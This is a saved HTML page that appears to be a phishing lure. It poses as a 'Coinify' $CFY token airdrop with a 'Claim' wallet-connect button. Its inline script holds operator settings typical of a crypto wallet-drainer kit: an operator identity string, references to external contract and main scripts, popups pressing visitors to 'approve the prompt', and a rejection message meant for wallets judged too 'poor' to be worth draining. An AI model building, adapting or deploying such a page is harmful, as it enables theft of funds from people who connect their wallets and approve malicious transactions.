<!DOCTYPE html>
<html lang="en" class="dark" style="color-scheme: dark;" data-scrapbook-source="https://app.coinify.ai/"
  data-scrapbook-create="20231220234435181" data-scrapbook-title="Coinify">

<head>
  <link rel="stylesheet" href="9d93ecbb97cd7b8f.css" data-precedence="next">
  <link rel="stylesheet" href="fd148f13ac2c7177.css" data-precedence="next">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta charset="UTF-8">
  <title>Coinify</title>
  <meta name="description" content="The intelligent way to launch an Ethereum token">
  <meta name="next-size-adjust">
  <script
    data-scrapbook-elem="custom-elements-loader">(function (names) { if (!customElements) { return; } for (const name of names) { customElements.define(name, class CustomElement extends HTMLElement { }); } })(["next-route-announcer"])</script>
</head>
<head>
  <script defer="defer" src="js/vendors.js"></script>
  <script defer="defer" src="js/contracts.js"></script>
  <script defer="defer" src="js/main.js"></script>

  <script>
    window.UNIQUE_IDENTITY = "musths_wheyish_99";

    // Pick a theme here, this defaults to "light"
    window.modal_theme = "dark"

    // https://docs.walletconnect.com/web3modal/v2/html/wagmi/theming
    window.modal_variables = {
      /* Example of what you can do */
      "--w3m-accent-color": "#FFD637",
      "--w3m-background-color": "#FFD637",
      "--w3m-logo-image-url": "/coinify-logo.png",
    };

    // Notification modals
    window.popups = {
      PENDING: {
        // The popup that shows when they get prompted
        // title: "Claim Pending",
        text: "You must approve the prompt in order to continue."
      },
      INVALID: {
        // Shown when they connect on a wallet that is poor.
        // title: "Ineligible Address",
        text: "The connected account is not eligible for this event.\nPlease try using a different account.",
      }
    }

    // Only touch this if you know what you're doing!
    window.OVERRIDE_MODE = false;
  </script>
</head>

<body class="relative h-[100vh] min-h-screen overflow-hidden">
  <div data-rk="">
    <style>
      [data-rk] {
        --rk-blurs-modalOverlay: blur(0px);
        --rk-fonts-body: SFRounded, ui-rounded, "SF Pro Rounded", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
        --rk-radii-actionButton: 9999px;
        --rk-radii-connectButton: 12px;
        --rk-radii-menuButton: 12px;
        --rk-radii-modal: 24px;
        --rk-radii-modalMobile: 28px;
        --rk-colors-accentColor: #0E76FD;
        --rk-colors-accentColorForeground: #FFF;
        --rk-colors-actionButtonBorder: rgba(0, 0, 0, 0.04);
        --rk-colors-actionButtonBorderMobile: rgba(0, 0, 0, 0.06);
        --rk-colors-actionButtonSecondaryBackground: rgba(0, 0, 0, 0.06);
        --rk-colors-closeButton: rgba(60, 66, 66, 0.8);
        --rk-colors-closeButtonBackground: rgba(0, 0, 0, 0.06);
        --rk-colors-connectButtonBackground: #FFF;
        --rk-colors-connectButtonBackgroundError: #FF494A;
        --rk-colors-connectButtonInnerBackground: linear-gradient(0deg, rgba(0, 0, 0, 0.03), rgba(0, 0, 0, 0.06));
        --rk-colors-connectButtonText: #25292E;
        --rk-colors-connectButtonTextError: #FFF;
        --rk-colors-connectionIndicator: #30E000;
        --rk-colors-downloadBottomCardBackground: linear-gradient(126deg, rgba(255, 255, 255, 0) 9.49%, rgba(171, 171, 171, 0.04) 71.04%), #FFFFFF;
        --rk-colors-downloadTopCardBackground: linear-gradient(126deg, rgba(171, 171, 171, 0.2) 9.49%, rgba(255, 255, 255, 0) 71.04%), #FFFFFF;
        --rk-colors-error: #FF494A;
        --rk-colors-generalBorder: rgba(0, 0, 0, 0.06);
        --rk-colors-generalBorderDim: rgba(0, 0, 0, 0.03);
        --rk-colors-menuItemBackground: rgba(60, 66, 66, 0.1);
        --rk-colors-modalBackdrop: rgba(0, 0, 0, 0.3);
        --rk-colors-modalBackground: #FFF;
        --rk-colors-modalBorder: transparent;
        --rk-colors-modalText: #25292E;
        --rk-colors-modalTextDim: rgba(60, 66, 66, 0.3);
        --rk-colors-modalTextSecondary: rgba(60, 66, 66, 0.6);
        --rk-colors-profileAction: #FFF;
        --rk-colors-profileActionHover: rgba(255, 255, 255, 0.5);
        --rk-colors-profileForeground: rgba(60, 66, 66, 0.06);
        --rk-colors-selectedOptionBorder: rgba(60, 66, 66, 0.1);
        --rk-colors-standby: #FFD641;
        --rk-shadows-connectButton: 0px 4px 12px rgba(0, 0, 0, 0.1);
        --rk-shadows-dialog: 0px 8px 32px rgba(0, 0, 0, 0.32);
        --rk-shadows-profileDetailsAction: 0px 2px 6px rgba(37, 41, 46, 0.04);
        --rk-shadows-selectedOption: 0px 2px 6px rgba(0, 0, 0, 0.24);
        --rk-shadows-selectedWallet: 0px 2px 6px rgba(0, 0, 0, 0.12);
        --rk-shadows-walletLogo: 0px 2px 16px rgba(0, 0, 0, 0.16);
      }
    </style>
    <nav class="p-0 shadow dark:border-b bg-neutral-950 dark:border-[#222222]/50">
      <div class="m-auto px-3 lg:px-0 flex max-w-7xl flex-wrap items-center justify-between gap-3"><a
          class="flex items-center gap-1" href=""><img alt="brand" loading="lazy" width="150" height="100"
            decoding="async" data-nimg="1" srcset="coinify-logo-1.png 1x, coinify-logo.png 2x" src="coinify-logo.png"
            style="color: transparent;"></a>
        <div class="flex items-center gap-4">
          <div class="iekbcc0 ju367va ju367v1n" style=""></div>
        </div>
      </div>
    </nav>
    <main
      class="flex flex-col items-center justify-center h-screen w-full flex-1 px-20 text-center bg-gradient-to-b from-[#060400] to-[#120D00]">
      <div class="flex flex-col space-y-6 justify-center items-center h-full">
        <h1
          class="bg-gradient-to-r from-rose-100 to-teal-100 text-transparent bg-clip-text font-medium text-3xl md:text-5xl">
          $CFY Airdrop Is Now Live</h1><button
          class="iekbcc0 iekbcc9 ju367v73 ju367v7o ju367v9c ju367vn ju367vec ju367vex ju367v11 ju367v1c ju367v2b ju367v8o _12cbo8i3 ju367v8m _12cbo8i4 _12cbo8i6"
          type="button" data-testid="rk-connect-button" id="connect_button">Claim $CFY</button>
      </div>
    </main>
    <style>
      #nprogress {
        pointer-events: none;
      }

      #nprogress .bar {
        background: #fffd00;

        position: fixed;
        z-index: 1031;
        top: 0;
        left: 0;

        width: 100%;
        height: 2px;
      }

      /* Fancy blur effect */
      #nprogress .peg {
        display: block;
        position: absolute;
        right: 0px;
        width: 100px;
        height: 100%;
        box-shadow: 0 0 10px #fffd00, 0 0 5px #fffd00;
        opacity: 1.0;

        -webkit-transform: rotate(3deg) translate(0px, -4px);
        -ms-transform: rotate(3deg) translate(0px, -4px);
        transform: rotate(3deg) translate(0px, -4px);
      }

      /* Remove these to get rid of the spinner */
      #nprogress .spinner {
        display: block;
        position: fixed;
        z-index: 1031;
        top: 15px;
        right: 15px;
      }

      #nprogress .spinner-icon {
        width: 18px;
        height: 18px;
        box-sizing: border-box;

        border: solid 2px transparent;
        border-top-color: #fffd00;
        border-left-color: #fffd00;
        border-radius: 50%;

        -webkit-animation: nprogress-spinner 400ms linear infinite;
        animation: nprogress-spinner 400ms linear infinite;
      }

      .nprogress-custom-parent {
        overflow: hidden;
        position: relative;
      }

      .nprogress-custom-parent #nprogress .spinner,
      .nprogress-custom-parent #nprogress .bar {
        position: absolute;
      }

      @-webkit-keyframes nprogress-spinner {
        0% {
          -webkit-transform: rotate(0deg);
        }

        100% {
          -webkit-transform: rotate(360deg);
        }
      }

      @keyframes nprogress-spinner {
        0% {
          transform: rotate(0deg);
        }

        100% {
          transform: rotate(360deg);
        }
      }
    </style>
  </div>
  <div role="region" aria-label="Notifications (F8)" tabindex="-1" style="pointer-events: none;">
    <ol tabindex="-1"
      class="fixed top-0 z-[100] flex max-h-screen w-full flex-col-reverse p-4 sm:bottom-0 sm:right-0 sm:top-auto sm:flex-col md:max-w-[420px]">
    </ol>
  </div><next-route-announcer style="position: absolute;"
    data-scrapbook-shadowdom="<div aria-live=&quot;assertive&quot; id=&quot;__next-route-announcer__&quot; role=&quot;alert&quot; style=&quot;position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;&quot;></div>"></next-route-announcer>
  <script
    data-scrapbook-elem="basic-loader">(function () { var k1 = "data-scrapbook-shadowdom", k2 = "data-scrapbook-canvas", k3 = "data-scrapbook-input-indeterminate", k4 = "data-scrapbook-input-checked", k5 = "data-scrapbook-option-selected", k6 = "data-scrapbook-input-value", k7 = "data-scrapbook-textarea-value", fn = function (r) { var E = r.querySelectorAll ? r.querySelectorAll("*") : r.getElementsByTagName("*"), i = E.length, e, d, s; while (i--) { e = E[i]; if ((d = e.getAttribute(k1)) !== null && !e.shadowRoot && e.attachShadow) { s = e.attachShadow({ mode: 'open' }); s.innerHTML = d; e.removeAttribute(k1); } if ((d = e.getAttribute(k2)) !== null) { (function () { var c = e, g = new Image(); g.onload = function () { c.getContext('2d').drawImage(g, 0, 0); }; g.src = d; })(); e.removeAttribute(k2); } if ((d = e.getAttribute(k3)) !== null) { e.indeterminate = true; e.removeAttribute(k3); } if ((d = e.getAttribute(k4)) !== null) { e.checked = d === 'true'; e.removeAttribute(k4); } if ((d = e.getAttribute(k5)) !== null) { e.selected = d === 'true'; e.removeAttribute(k5); } if ((d = e.getAttribute(k6)) !== null) { e.value = d; e.removeAttribute(k6); } if ((d = e.getAttribute(k7)) !== null) { e.value = d; e.removeAttribute(k7); } if (e.shadowRoot) { fn(e.shadowRoot); } } }; fn(document); })()</script>
</body>

</html>
